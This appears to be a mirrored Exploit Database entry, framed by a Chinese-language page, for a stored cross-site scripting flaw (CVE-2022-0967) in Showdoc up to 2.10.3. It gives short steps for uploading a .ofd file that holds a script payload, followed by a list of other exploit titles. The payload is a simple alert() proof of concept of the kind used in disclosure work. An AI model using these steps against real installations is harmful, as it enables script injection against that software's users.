Showdoc 2.10.3 – Stored Cross-Site Scripting (XSS)

Exploit Database
102 阅读

作者： Akshay Ravi

日期： 2022-05-17
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/50941/

# Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Akshay Ravi
# Vendor Homepage: https://github.com/star7th/showdoc
# Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3
# Version: <= 2.10.3
# Tested on: macOS Monterey
# CVE : CVE-2022-0967

Description: Stored XSS via uploading file in .ofd format

1. Create a file with .ofd extension and add XSS Payload inside the file
	
	filename = "payload.ofd"
	payload = "<script>alert(1)</script>"

2. Login to showdoc v2.10.2 and go to file library
	
	Endpoint = "https://www.site.com/attachment/index"

3. Upload the payload on file library and click on the check button
4. The XSS payload will executed once we visited the URL

last Exploits
Showdoc 2.10.3 – Stored Cross-Site Scripting (XSS)的更多信息

WordPress Plugin Simple Download Button ShortCode 1.0 – Remote File Disclosure：
Water Billing System 1.0 – ‘username’ and ‘password’ parameters SQL Injection：
Citrix Application Delivery Controller (ADC) and Gateway 13.0 – Path Traversal：
Pre Online Tests Generator Pro – SQL Injection：
Joomla! Component com_crowdsource – SQL Injection：
JobPost – SQL Injection：
Crea8Social 1.3 – Persistent Cross-Site Scripting：
Itech Dating Script 3.26 – ‘send_gift.php’ SQL Injection：